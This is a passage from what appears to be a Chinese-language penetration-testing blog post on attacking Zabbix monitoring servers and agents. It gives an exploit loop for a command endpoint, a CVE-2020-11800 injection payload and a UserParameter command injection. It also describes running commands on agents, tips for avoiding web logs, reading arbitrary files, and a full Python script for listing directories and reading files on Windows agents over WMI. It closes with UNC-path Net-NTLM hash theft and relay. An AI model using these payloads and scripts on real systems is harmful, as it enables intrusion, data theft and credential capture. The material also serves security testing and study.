</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10000</span><span class="p">,</span> <span class="mi">10500</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">data</span> <span class="o">=</span> <span class="n">send</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="p">{</span><span class="s2">&#34;request&#34;</span><span class="p">:</span><span class="s2">&#34;command&#34;</span><span class="p">,</span><span class="s2">&#34;scriptid&#34;</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span><span class="s2">&#34;hostid&#34;</span><span class="p">:</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)})</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">data</span> <span class="ow">and</span> <span class="sa">b</span><span class="s1">&#39;failed&#39;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;hostid: </span><span class="si">%d</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="n">i</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202204.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202204.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202204.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202204.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202204.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202204.png-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202690.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202690.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202690.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202690.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202690.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221202690.png-water_print" /></p>
<h3 id="24-cve-2020-11800---命令注入">2.4 CVE-2020-11800 - 命令注入</h3>
<p>该漏洞为基于 CVE-2017-2824 的绕过利用。未授权攻击者向 Zabbix Server 的 10051 端口发送 trapper 功能相关命令，利用漏洞即可在 Zabbix Server 上执行系统命令。</p>
<p>其中 CVE-2020-11800 漏洞通过 ipv6 格式绕过 ip 字段检测注入执行 shell 命令，<strong>受数据表字段限制 Payload 长度只能为 64 个字符</strong>。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;request&#34;</span><span class="p">:</span><span class="s2">&#34;active checks&#34;</span><span class="p">,</span><span class="nt">&#34;host&#34;</span><span class="p">:</span><span class="s2">&#34;vulhub&#34;</span><span class="p">,</span><span class="nt">&#34;ip&#34;</span><span class="p">:</span><span class="s2">&#34;ffff:::;whoami&#34;</span><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>由于 CVE-2017-2824 与 CVE-2020-11800 漏洞点及利用区别不大，不再复述。</p>
<h2 id="3-zabbix-后渗透测试">3 Zabbix 后渗透测试</h2>
<p>在拥有 Zabbix Server 权限后，如何利用当前权限进一步控制 Zabbix Agent？前文讲到，Zabbix Agent 的 10050 端口仅处理来自 Zabbix Server 或 Proxy 的请求，所以后续攻击都是依赖于 Zabbix Server 权限进行扩展。</p>
<blockquote>
<p>在 zabbix 中，我们要监控的某一个指标，被称为“监控项”，就像我们的磁盘使用率，在 zabbix 中就可以被认为是一个“监控项”(item)，如果要获取到“监控项”的相关信息，我们则要执行一个命令，但是我们不能直接调用命令，而是通过一个“别名”去调用命令，这个“命令别名”在 zabbix 中被称为“键”(key)，所以在 zabbix 中，如果我们想要获取到一个“监控项”的值，则需要有对应的“键”，通过“键”能够调用相应的命令，获取到对应的监控信息。</p>
</blockquote>
<p>在控制 Zabbix Server 权限的情况下可通过 <code>zabbix_get</code> 命令向 Agent 获取监控项数据，比如说获取 Agent 的系统内核信息：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221542444.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221542444.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221542444.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221542444.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221542444.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221542444.png-water_print" /></p>
<p>关于监控项，可以参考：</p>
<p>Agent监控项较多不一一例举，可以参考：</p>
<p><a href="https://www.zabbix.com/documentation/4.0/zh/manual/config/items/itemtypes/zabbix_agent" target="_blank" rel="noopener noreffer">1. Zabbix Agent监控项</a></p>
<p><a href="https://www.zabbix.com/documentation/4.0/zh/manual/config/items/itemtypes/zabbix_agent/win_keys" target="_blank" rel="noopener noreffer">2. Zabbix Agent Windows监控项</a></p>
<p>针对 item 监控项的攻击面进行挖掘，存在以下利用场景：</p>
<h3 id="31-enableremotecommands-参数远程命令执行">3.1 EnableRemoteCommands 参数远程命令执行</h3>
<p>前文讲到，Agent 远程执行系统命令需要在 <code>zabbix_agentd.conf</code> 配置文件中开启 EnableRemoteCommands 参数。</p>
<p>在 Zabbix Web 上添加脚本，<code>Execute on</code> 选项可根据需求选择，选择 <code>Zabbix server</code> 不需要开启 EnableRemoteCommands 参数，所以一般控制 Zabbix Web 后可通过该方式在 Zabbix Server 上执行命令拿到服务器权限。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221549384.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221549384.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221549384.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221549384.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221549384.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221549384.png-water_print" /></p>
<p>如果要指定某个主机执行该脚本，可从 Zabbix Web 的“监测中 -&gt; 最新数据”功能中根据过滤条件找到想要执行脚本的主机，单击主机名即可在对应 Agent 上执行脚本。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221738690.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221738690.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221738690.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221738690.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221738690.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221738690.png-water_print" /></p>
<p>如果类型是 <code>Execute on Zabbix Agent</code> ，Agent 配置文件在未开启 EnableRemoteCommands 参数的情况下会返回报错。</p>
<p>如果不想在 Zabbix Web 上留下太多日志痕迹，或者想批量控制 Agent，拿下 Zabbix Server 权限后可以通过 zabbix_get 命令向 Agent 执行监控项命令，<strong>在 Zabbix Web 执行脚本实际上等于执行 system.run 监控项命令</strong>。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221705434.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221705434.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221705434.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221705434.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221705434.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221705434.png-water_print" /></p>
<h3 id="32-userparameter-自定义参数命令注入">3.2 UserParameter 自定义参数命令注入</h3>
<p>当 Zabbiax Agent 的 <code>zabbix_agentd.conf</code> 配置文件开启 UnsafeUserParameters 参数的情况下，传参值字符不受限制，只需要找到存在传参的自定义参数 UserParameter，就能达到命令注入的效果。</p>
<p>以下面配置为例：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221719846.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221719846.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221719846.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221719846.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221719846.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221719846.png-water_print" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">zabbix_get -s agent -p <span class="m">10050</span> -k <span class="s2">&#34;ping[test &amp;&amp; id]&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221723482.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221723482.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221723482.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221723482.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221723482.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221723482.png-water_print" /></p>
<h3 id="33-任意文件读取">3.3 任意文件读取</h3>
<p>Zabbix Agent 如果没有配置不当的问题，是否有其他姿势可以利用呢？答案是肯定的。</p>
<p>Zabbix 原生监控项中，<code>vfs.file.contents</code>命令可以读取指定文件，但无法读取超过 64KB 的文件。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221642153.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221642153.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221642153.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221642153.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221642153.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221642153.png-water_print" /></p>
<p>zabbix_agentd 服务默认以低权限用户 zabbix 运行，读取文件受 zabbix 用户权限限制。开启 AllowRoot 参数情况下 zabbix_agentd 服务会以 root 权限运行，利用 <code>vfs.file.contents</code> 命令就能任意文件读取。</p>
<p>如果文件超过 64KB 无法读取，在了解该文件字段格式的情况下可利用 <code>vfs.file.regexp</code> 命令正则获取关键内容。</p>
<h3 id="34-windows-目录遍历">3.4 Windows 目录遍历</h3>
<p>Zabbix原生监控项中，<code>wmi.get </code>命令可以执行 WMI 查询并返回第一个对象，通过 WQL 语句可以查询许多机器信息。</p>
<p>如：WQL 查询盘符</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">zabbix_get -s agent -p <span class="m">10050</span> -k <span class="s2">&#34;wmi.get[root\\cimv2,\&#34;SELECT Name FROM Win32_LogicalDisk\&#34;]&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>利用 <code>wmi.get </code>命令进行目录遍历、文件遍历，结合 <code>vfs.file.contents</code> 命令就能够在 Windows 下实现任意文件读取。</p>
<p>基于 zabbix_get 命令写了个 python 脚本，实现 Windows 的列目录、读文件功能。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span><span class="lnt">55
</span><span class="lnt">56
</span><span class="lnt">57
</span><span class="lnt">58
</span><span class="lnt">59
</span><span class="lnt">60
</span><span class="lnt">61
</span><span class="lnt">62
</span><span class="lnt">63
</span><span class="lnt">64
</span><span class="lnt">65
</span><span class="lnt">66
</span><span class="lnt">67
</span><span class="lnt">68
</span><span class="lnt">69
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">count</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">zabbix_exec</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">command</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">global</span> <span class="n">count</span>
</span></span><span class="line"><span class="cl">    <span class="n">count</span> <span class="o">=</span> <span class="n">count</span> <span class="o">+</span> <span class="mi">1</span>
</span></span><span class="line"><span class="cl">    <span class="n">check</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s2">&#34;./zabbix_get -s &#34;</span> <span class="o">+</span> <span class="n">ip</span> <span class="o">+</span> <span class="s2">&#34; -k </span><span class="se">\&#34;</span><span class="s2">&#34;</span> <span class="o">+</span> <span class="n">command</span> <span class="o">+</span> <span class="s2">&#34;</span><span class="se">\&#34;</span><span class="s2">&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="s2">&#34;Cannot obtain WMI information&#34;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">check</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">check</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="kc">False</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">getpath</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">path</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\\</span><span class="s2">&#34;</span><span class="p">,</span><span class="s2">&#34;</span><span class="se">\\\\\\\\</span><span class="s2">&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&#34;$&#34;</span><span class="p">,</span><span class="s2">&#34;</span><span class="se">\\</span><span class="s2">$&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">GetDisk</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">where</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">while</span><span class="p">(</span><span class="kc">True</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">check_disk</span> <span class="o">=</span> <span class="n">zabbix_exec</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s2">&#34;wmi.get[root\cimv2,</span><span class="se">\\\&#34;</span><span class="s2">SELECT Name FROM Win32_LogicalDisk WHERE Name != &#39;&#39; &#34;</span> <span class="o">+</span> <span class="n">where</span> <span class="o">+</span> <span class="s2">&#34;</span><span class="se">\\\&#34;</span><span class="s2">]&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">check_disk</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="n">check_disk</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">where</span> <span class="o">=</span> <span class="n">where</span> <span class="o">+</span> <span class="s2">&#34;AND Name != &#39;&#34;</span> <span class="o">+</span> <span class="n">check_disk</span><span class="o">+</span> <span class="s2">&#34;&#39;&#34;</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">GetDirs</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="nb">dir</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">drive</span> <span class="o">=</span> <span class="nb">dir</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="n">path</span> <span class="o">=</span> <span class="nb">dir</span><span class="p">[</span><span class="mi">2</span><span class="p">:]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">where</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">while</span><span class="p">(</span><span class="kc">True</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">check_dir</span> <span class="o">=</span> <span class="n">zabbix_exec</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s2">&#34;wmi.get[root\cimv2,</span><span class="se">\\\&#34;</span><span class="s2">SELECT Caption FROM Win32_Directory WHERE Drive=&#39;&#34;</span> <span class="o">+</span> <span class="n">drive</span> <span class="o">+</span> <span class="s2">&#34;&#39; AND Path=&#39;&#34;</span> <span class="o">+</span> <span class="n">getpath</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o">+</span> <span class="s2">&#34;&#39; &#34;</span> <span class="o">+</span> <span class="n">where</span> <span class="o">+</span> <span class="s2">&#34;</span><span class="se">\\\&#34;</span><span class="s2">]&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">check_dir</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="n">check_dir</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">where</span> <span class="o">=</span> <span class="n">where</span> <span class="o">+</span> <span class="s2">&#34;AND Caption != &#39;&#34;</span> <span class="o">+</span> <span class="n">getpath</span><span class="p">(</span><span class="n">check_dir</span><span class="p">)</span> <span class="o">+</span> <span class="s2">&#34;&#39;&#34;</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">GetFiles</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="nb">dir</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">drive</span> <span class="o">=</span> <span class="nb">dir</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="n">path</span> <span class="o">=</span> <span class="nb">dir</span><span class="p">[</span><span class="mi">2</span><span class="p">:]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">where</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">while</span><span class="p">(</span><span class="kc">True</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">check_file</span> <span class="o">=</span> <span class="n">zabbix_exec</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s2">&#34;wmi.get[root\cimv2,</span><span class="se">\\\&#34;</span><span class="s2">SELECT Name FROM CIM_DataFile WHERE Drive=&#39;&#34;</span> <span class="o">+</span> <span class="n">drive</span> <span class="o">+</span> <span class="s2">&#34;&#39; AND Path=&#39;&#34;</span> <span class="o">+</span> <span class="n">getpath</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o">+</span> <span class="s2">&#34;&#39; &#34;</span> <span class="o">+</span> <span class="n">where</span> <span class="o">+</span> <span class="s2">&#34;</span><span class="se">\\\&#34;</span><span class="s2">]&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">check_file</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="s2">&#34;Invalid item key format&#34;</span> <span class="ow">in</span> <span class="n">check_file</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="k">continue</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="n">check_file</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">where</span> <span class="o">=</span> <span class="n">where</span> <span class="o">+</span> <span class="s2">&#34;AND Name != &#39;&#34;</span> <span class="o">+</span> <span class="n">getpath</span><span class="p">(</span><span class="n">check_file</span><span class="p">)</span> <span class="o">+</span> <span class="s2">&#34;&#39;&#34;</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">Readfile</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">file</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">read</span> <span class="o">=</span> <span class="n">zabbix_exec</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s2">&#34;vfs.file.contents[&#34;</span> <span class="o">+</span> <span class="n">file</span> <span class="o">+</span> <span class="s2">&#34;]&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="n">read</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">GetDisk</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">    <span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s2">&#34;</span><span class="se">\\</span><span class="s2">&#34;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">Readfile</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">GetDirs</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">        <span class="n">GetFiles</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Request count: &#34;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">count</span><span class="p">))</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="35-windows-unc-路径利用">3.5 Windows UNC 路径利用</h3>
<p>在 Windows Zabbix Agent 环境中，可以利用 <code>vfs.file.contents</code> 命令读取 UNC 路径，窃取 Zabbix Agent 机器的 Net-NTLM hash，从而进一步 Net-NTLM relay 攻击。</p>
<p>Window Zabbix Agent 默认安装成 Windows 服务，运行在 SYSTEM 权限下。在工作组环境中，system 用户的 Net-NTLM hash 为空，所以工作组环境无法利用。</p>
<p>在域内环境中，SYSTEM 用户即机器用户，如果是 Net-NTLM v1 的情况下，可以利用 Responder 工具获取 Net-NTLM v1 hash 并通过算法缺陷解密拿到 NTLM hash，配合资源约束委派获取域内机器用户权限，从而拿下 Agent 机器权限。</p>
<p>也可以配合 CVE-2019-1040 漏洞，relay 到 ldap 上配置基于资源的约束委派进而拿下 Agent 机器权限。（此处直接结果直接引用，未做实验）</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645843.jpg-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645843.jpg-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645843.jpg-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645843.jpg-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645843.jpg-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645843.jpg-water_print" /></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645941.jpg-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645941.jpg-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645941.jpg-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645941.jpg-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645941.jpg-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202203221645941.jpg-water_print" /></p>
<h3 id="36-zabbix-proxy-和主动检查模式利用场景">3.6 Zabbix Proxy 和主动检查模式利用场景</h3>
<p>通过 zabbix_get 工具执行监控项命令只适合 Agent 被动模式且 10050 端口可以通讯的场景</p>
